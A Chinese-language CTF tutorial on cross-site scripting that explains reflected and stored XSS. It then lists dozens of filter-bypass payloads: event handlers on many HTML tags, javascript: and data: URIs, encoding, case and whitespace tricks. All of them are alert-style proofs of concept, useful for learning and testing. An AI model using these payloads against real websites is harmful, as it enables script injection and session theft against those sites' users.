一、概念:
xss跨站脚本:一种经常出现在WEB应用程序中的计算机安全漏洞,是由于WEB应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意代码的脚本注入到网页中去,当其他用户浏览这些网站的时候,就会执行其中的恶意代码,窃取用户的cookies,会话劫持,钓鱼欺骗。
二、分类:
1、反射型也称非持久性脚本,主要将恶意脚本附加到URL地址的参数值中,通常出现在网站的搜索栏、用户登录入口等,用来窃取客户端cookies或进行钓鱼欺骗。
2、持久性跨站脚本,不需要用户单击特定URL就能执行跨站脚本,攻击者实现将恶意JavaScript代码上传或存储到漏洞服务器中,只要受害者浏览包含恶意JavaScript代码的页面就会执行恶意代码,一般出现在网站的留言、评论、博客日志等交互处,恶意脚本被存储到客户端或者服务器数据库中 。
三、CTF中的XSS
CTF中的XSS题目设计一般为:要求参赛者在网址或者网页的搜索框中插入非持久性脚本,绕过关键词过滤,脚本运行弹出窗口,网页后台代码会检测网页是否有窗口弹出,有弹出,网页会执行后台代码,跳转网页给出flag或者直接弹出带有flag的窗口。
四、xss绕过关键词过滤
解答CTF中的XSS题目,目的就是能让自己插入的代码运行弹出窗口,获取flag。
1、利用弹窗标签,这是最主要的一种方法,其他方法都是围绕其服务
a标签
#javascript协议
<a href=javascript:alert(1)>点我啊</a># data协议
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>点我</a># url编码的data协议
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E># 另两种方式实现
<a xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="black"/></a></svg>
<math><a xlink:href=javascript:alert(1)>点我</math>
script标签
# 直接弹窗
<script>alert(1)</script>
<script>confirm(1)</script>
<script>pormpt(1)</script># javascript协议编码
<script>alert(String.fromCharCode(49))</script># 如果输出是在setTimeout里,我们依然可以直接执行alert(1)
<script>setTimeout('alert(1)',0)</script>
button标签
# 点击弹窗
<button/onclick=alert(1) >点我</button># 不需要点击就能弹窗
<button onfocus=alert(1) autofocus>
p标签
# 可以直接使用事件触发
<p/onmouseover=alert(1)>点我</p>
img标签
# 可以使用事件触发
<img src=x onerror=alert(1)>
body标签
# 事件触发
<body onload=alert(1)># onscroll 事件在元素滚动条在滚动时触发,即页面存在很多内容,需要滚动才能看到下面的内容,就会触发
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
var标签
# 事件触发,一般是用不需交互的事件比如鼠标移动等
<var onmousemove=alert(1)>M</var>
div标签
# 事件触发
<div/onclick='alert(1)'>X</div>
input标签
和button一样通过autofocus可以达到无需交互即可弹窗的效果。
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
select标签
<select onfocus=javascript:alert(1) autofocus>
textarea标签
<textarea onfocus=javascript:alert(1) autofocus>
keygen标签
<keygen onfocus=javascript:alert(1) autofocus>
frameset标签
<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
svg标签
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
math标签
<math href="javascript:javascript:alert(1)">CLICKME</math>
<math><y/xlink:href=javascript:alert(51)>test1
video标签
<video><source onerror="alert(1)">
<video src=x onerror=alert(48)>
audio标签
<audio src=x onerror=alert(47)>
embed标签
<embed src=javascript:alert(1)>
meta标签
测试时发现,文章标题跑到meta标签中,那么只需要跳出当前属性再添加http-equiv=”refresh”,就可以构造一个有效地xss payload。还有一些猥琐的思路,就是通过给http-equiv设置set-cookie,进一步重新设置cookie来干一些猥琐的事情。
<meta http-equiv="refresh" content="0;javascript:alert(1)"/><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
marquee标签
<marquee onstart="alert('1')"></marquee>
isindex标签
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image>
当过滤掉javascript,alert等常见关键词,单引号,双引号,分号时,可以尝试使用以上不同的标签插入,达到弹出窗口的目的。
2. 大小写绕过:<sCript>
3. alert被过滤,可以尝试prompt和confirm
4. 空格被过滤:<img/src=""onerror=alert(2)> <svg/onload=alert(2)></svg>
5. <imgsrc="1"onerror="alert(1)">和<imgsrc="1"onerror="alert(1)">是等效的,没有过滤&,#等符号,我们就可以写入任意字符
6. 长度限制时: <q/oncut=alert(1)>//在限制长度的地方很有效
7. 括号被过滤,可以使用throw来抛出数据
<a onmouseover="javascript:window.onerror=alert;throw 1">2</a>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
9. 过滤某些关键字(如:javascript) 可以在属性中的引号内容中使用空字符、空格、TAB换行、注释、特殊的函数,将代码行隔开。如:javas%09cript:alert()、javas%0acript:alert()、javas%0dcript:alert(),其中%0a表示换行。
10、宽字节绕过:gbxxxx系列的编码,那么我们尝试一下宽字节 %c0,%bf,%5c,%df
11、编码绕过:十六进制编码、jsfuck编码、url编码、unicode编码
<0x736372697074>alert('123')</0x736372697074>
<img src="1" onerror="alert(1)">
五、总结
谈了这么多关于XSS绕过的内容,其实要想记住上面的所有内容很难,也完全没有必要,上面的方法其实只是提供一种思路,具体的绕过还得在实践中来检验,下面的章节将带领大家在练习题目中去使用这些方法。
注:以上内容仅供学习交流使用,严禁使用于非法途径。
